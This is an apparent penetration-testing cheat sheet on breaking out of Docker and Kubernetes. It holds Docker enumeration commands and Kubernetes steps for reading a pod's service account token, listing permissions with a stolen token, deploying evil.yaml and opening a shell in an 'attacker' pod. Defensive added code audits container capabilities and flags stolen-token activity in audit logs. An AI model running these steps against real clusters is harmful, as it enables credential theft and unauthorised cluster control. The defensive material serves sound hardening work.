Container/Sandbox Breakout

Virtual inceptions

Docker

I first check the host for any cues of containerization and for other nodes on the network. You can also try running the capsh binary; if it exists, it prints the container's current capabilities.

cat /etc/hosts #check for a container ID like 8u9ru98432
capsh --print #check current Unix capabilities

ls -l /proc/*/ns #list the namespaces of each process

ls -al /dev/ | grep disk #check for host disks
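capsh is often absent from minimal images, but the same information sits in the CapEff line of /proc/self/status. The following is an added example, not code from the original cheat sheet: it decodes that hex mask into capability names and compares it with Docker's default capability set, so a hardening check can tell at a glance whether a container was started with more than the baseline. It assumes the bit numbering from the kernel's include/uapi/linux/capability.h; the status excerpts are constructed.

```python
"""Decode a Linux capability bitmask such as the CapEff line in
/proc/<pid>/status and compare it against Docker's default capability set.

Added example; it is not part of the original cheat sheet. It assumes the
capability bit numbering from the kernel's include/uapi/linux/capability.h,
uses Docker's documented default set as the hardening baseline, and the
sample status excerpts are constructed.
"""
import re

# Capability names indexed by bit number (linux/capability.h, CAP_CHOWN = 0, ...).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Docker's default capability set for an unprivileged container.
DOCKER_DEFAULT = {
    "chown", "dac_override", "fowner", "fsetid", "kill", "setgid", "setuid",
    "setpcap", "net_bind_service", "net_raw", "sys_chroot", "mknod",
    "audit_write", "setfcap",
}

# Capabilities that reach host resources (mounts, ptrace, raw devices,
# kernel modules, BPF) and that hardening guides say to drop in containers.
HIGH_RISK = {
    "sys_admin", "sys_ptrace", "sys_module", "sys_rawio", "dac_read_search",
    "net_admin", "bpf", "perfmon", "sys_boot", "syslog",
}


def decode_caps(hex_mask):
    """Return the capability names whose bit is set in the hex mask, in bit order."""
    mask = int(hex_mask, 16)
    names = [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]
    if mask >> len(CAP_NAMES):  # bits this table does not know (newer kernel)
        names.append("unknown(bit>=%d)" % len(CAP_NAMES))
    return names


def read_cap_eff(status_text):
    """Extract the CapEff hex value from the text of /proc/<pid>/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line found")
    return m.group(1)


def audit_caps(hex_mask):
    """Summarise an effective capability mask against the Docker baseline."""
    caps = set(decode_caps(hex_mask))
    return {
        "caps": sorted(caps),
        "beyond_default": sorted(caps - DOCKER_DEFAULT),
        "high_risk": sorted(caps & HIGH_RISK),
    }


# Constructed excerpts of /proc/self/status: the first is what Docker grants
# by default, the second is a fully privileged (--privileged) container.
DEFAULT_STATUS = "Name:\tsh\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n"
PRIVILEGED_STATUS = "Name:\tsh\nCapEff:\t000001ffffffffff\n"

if __name__ == "__main__":
    # Inside a real container, read the live value; fall back to the sample.
    try:
        with open("/proc/self/status") as f:
            live = read_cap_eff(f.read())
    except (OSError, ValueError):
        live = read_cap_eff(PRIVILEGED_STATUS)
    report = audit_caps(live)
    print("CapEff %s -> %d capabilities" % (live, len(report["caps"])))
    print("beyond Docker default:", report["beyond_default"] or "none")
    print("high risk:", report["high_risk"] or "none")
```

Run it inside the container under review (or feed it a saved copy of /proc/self/status): an empty beyond_default list means the runtime granted only the stock set, while sys_admin or sys_ptrace showing up in high_risk is the signal to revisit the pod's securityContext or the docker run flags.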

Kubernetes

Try getting secrets.

cat /var/run/secrets/kubernetes.io/serviceaccount/token

List what you can do with this token.

kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list

Get pods & configs

kubectl get pods -o yaml > backup.config \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 
kubectl get pods \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 

Build & Deploy

kubectl apply -f ./evil.yaml \
	--server="https://kube-server:6443" \
	--token='<token you steal>' \
	--insecure-skip-tls-verify=true 

Execute command

kubectl exec -it attacker \
	--server="https://kube-server:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true \
	-- bash
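Every step above leaves a trace in the API server audit log: `auth can-i --list` creates a SelfSubjectRulesReview, the secret grab is a `list` on secrets, and `kubectl exec` is a `create` on the pods/exec subresource, all under a `system:serviceaccount:` identity. The following is an added example, not code from the original cheat sheet, showing detection logic that runs over JSON-lines audit events and flags those patterns when they come from a service account token. It assumes the audit.k8s.io/v1 Event field layout; the log lines and the allow-list of expected service accounts are constructed placeholders.

```python
"""Flag service-account activity in Kubernetes audit logs that matches the
stolen-token pattern above: permission enumeration (auth can-i --list creates
a selfsubjectrulesreviews object), secret listing, and pod exec.

Added example; not part of the original cheat sheet. It assumes the
audit.k8s.io/v1 Event field layout; the log lines and the allow-list of
expected service accounts are constructed placeholders.
"""
import json

SA_PREFIX = "system:serviceaccount:"

# Hypothetical allow-list: service accounts that legitimately call these APIs
# in this cluster (placeholder; tune to the real environment).
EXPECTED_SA = {"system:serviceaccount:kube-system:generic-garbage-collector"}


def classify(event):
    """Return a finding label for one audit event, or None if it is benign."""
    user = event.get("user", {}).get("username", "")
    if not user.startswith(SA_PREFIX) or user in EXPECTED_SA:
        return None
    ref = event.get("objectRef") or {}
    resource, sub, verb = ref.get("resource"), ref.get("subresource"), event.get("verb")
    if resource == "selfsubjectrulesreviews" and verb == "create":
        return "permission-enumeration"  # kubectl auth can-i --list
    if resource == "pods" and sub == "exec":
        return "pod-exec"                # kubectl exec with a pod's token
    if resource == "secrets" and verb in ("get", "list", "watch"):
        return "secret-access"
    if "kubectl" in event.get("userAgent", "").lower():
        return "kubectl-with-sa-token"   # workloads use client libraries, not kubectl
    return None


def scan(lines):
    """Run classify() over JSON-lines audit output and collect findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        # The API server emits several stages per request; keep the final one.
        if ev.get("stage", "ResponseComplete") != "ResponseComplete":
            continue
        label = classify(ev)
        if label:
            ref = ev.get("objectRef") or {}
            parts = (ref.get("namespace"), ref.get("resource"), ref.get("name"))
            findings.append({
                "finding": label,
                "user": ev["user"]["username"],
                "verb": ev.get("verb"),
                "target": "/".join(p for p in parts if p),
                "source": ",".join(ev.get("sourceIPs", [])),
                "status": (ev.get("responseStatus") or {}).get("code"),
            })
    return findings


def _ev(user, verb, resource, name="", sub=None, ua="Go-http-client/2.0",
        stage="ResponseComplete"):
    """Build one constructed audit.k8s.io/v1 Event record as a JSON line."""
    ref = {"resource": resource, "namespace": "default", "name": name}
    if sub:
        ref["subresource"] = sub
    return json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": stage,
        "verb": verb, "user": {"username": user, "groups": ["system:authenticated"]},
        "objectRef": ref, "userAgent": ua, "sourceIPs": ["10.244.1.7"],
        "responseStatus": {"code": 201 if verb == "create" else 200},
    })


# Constructed sample log: a pod's default token used for can-i, secrets and
# exec, plus benign traffic from an admin user and from expected workloads.
SA_DEFAULT = SA_PREFIX + "default:default"
SAMPLE_LOG = "\n".join([
    _ev(SA_DEFAULT, "create", "selfsubjectrulesreviews", ua="kubectl/v1.28.0",
        stage="RequestReceived"),
    _ev(SA_DEFAULT, "create", "selfsubjectrulesreviews", ua="kubectl/v1.28.0"),
    _ev(SA_DEFAULT, "list", "secrets", ua="kubectl/v1.28.0"),
    _ev(SA_DEFAULT, "create", "pods", name="attacker", sub="exec", ua="kubectl/v1.28.0"),
    _ev("kubernetes-admin", "create", "pods", name="web-0", sub="exec", ua="kubectl/v1.28.0"),
    _ev(SA_PREFIX + "kube-system:generic-garbage-collector", "list", "secrets"),
    _ev(SA_PREFIX + "app:web", "get", "configmaps", name="web-config"),
])

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

The ordering of the checks matters: the three resource-specific rules fire regardless of client, and the user-agent rule at the end only catches the weaker signal of kubectl being driven with a service account token. Replace the EXPECTED_SA placeholder with the accounts that really need these verbs, and pair the rule with `automountServiceAccountToken: false` on pods that never talk to the API, which removes the token file the page reads in the first place.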

Basic commands

kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints

#kubectl create deployment <deployment-name> --image=<docker image>
kubectl create deployment nginx-deployment --image=nginx
#Access the configuration of the deployment and modify it
#kubectl edit deployment <deployment-name>
kubectl edit deployment nginx-deployment
#Get the logs of the pod for debugging (the output of the docker container running)
#kubectl logs <replicaset-id/pod-id>
kubectl logs nginx-deployment-84cd76b964
#kubectl describe pod <pod-id>
kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
#kubectl exec -it <pod-id> -- bash
kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
#kubectl describe service <service-name>
kubectl describe service mongodb-service
#kubectl delete deployment <deployment-name>
kubectl delete deployment mongo-depl
#Deploy from config file
kubectl apply -f deployment.yml

https://github.com/TurboWindX/kube-hunter

https://github.com/TurboWindX/peirates
